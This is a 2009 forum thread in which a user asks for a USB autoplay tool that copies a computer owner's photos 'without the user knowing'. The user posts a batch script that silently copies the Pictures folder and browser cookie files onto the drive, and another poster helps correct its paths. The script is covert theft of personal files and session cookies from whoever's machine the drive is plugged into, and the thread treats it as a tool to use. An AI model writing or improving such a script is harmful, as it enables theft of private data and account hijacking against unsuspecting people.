LSC Posted April 23, 2009 Share Posted April 23, 2009 I dont know if there is one out there and if there is I dont know what it is called. I want some thing that will fits on my USB drive. what it should do is: 1. fit on to a flash drive. 2. auto play. 3. copy the my photo folder or any file ending with .img to the USB drive. 4. lt's has to been done with out the user knowing. Nono Quote Link to comment Share on other sites More sharing options...
LSC Posted April 23, 2009 Author Share Posted April 23, 2009 Ok i found this by looking back at an old post So I have to make a .bit file to do this. Ok. I just copied the one that was on the old post but I dont want it to just copy the desk top I want it to check the my photo folder or search for any .jpg, .gif ah you know the file types. Quote Link to comment Share on other sites More sharing options...
SomethingToChatWith Posted April 23, 2009 Share Posted April 23, 2009 Maybe if you linked to the orginal post containg the .bat file or posting it here someone could help you... Quote Link to comment Share on other sites More sharing options...
LSC Posted April 23, 2009 Author Share Posted April 23, 2009 I had the post in there and I was a broken link. posting stuff on here is a little weird. Ok but heres what i got so far: @echo off mkdir %~d0\%computername% mkdir %~d0\%computername%\pictures mkdir %~d0\%computername%\Cookies ::Pictures xcopy "c:\User\%username%\desktop\Pictures\*.*" %~d0\%computername% \Pictures /s /e /c /q /r /h /y /a ::COOKIES xcopy "C:\user\%username%\Cookies\*.txt" %~d0\%computername%\Cookies /s /e /c /q /r /h /y /a @cls @exit Quote Link to comment Share on other sites More sharing options...
SomethingToChatWith Posted April 24, 2009 Share Posted April 24, 2009 %homedrive% gets system drive, %homepath% gets path to current user's user directory, so copying the current user's "My Pictures" directory: xcopy "%homepdrive%\%homepath%\my pictures" %~d0\%computername%\pictures /s /e /c /q /r /h /y /a Quote Link to comment Share on other sites More sharing options...
Joerg Posted April 25, 2009 Share Posted April 25, 2009 If you want to have .img, why not .iso or .nrg? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.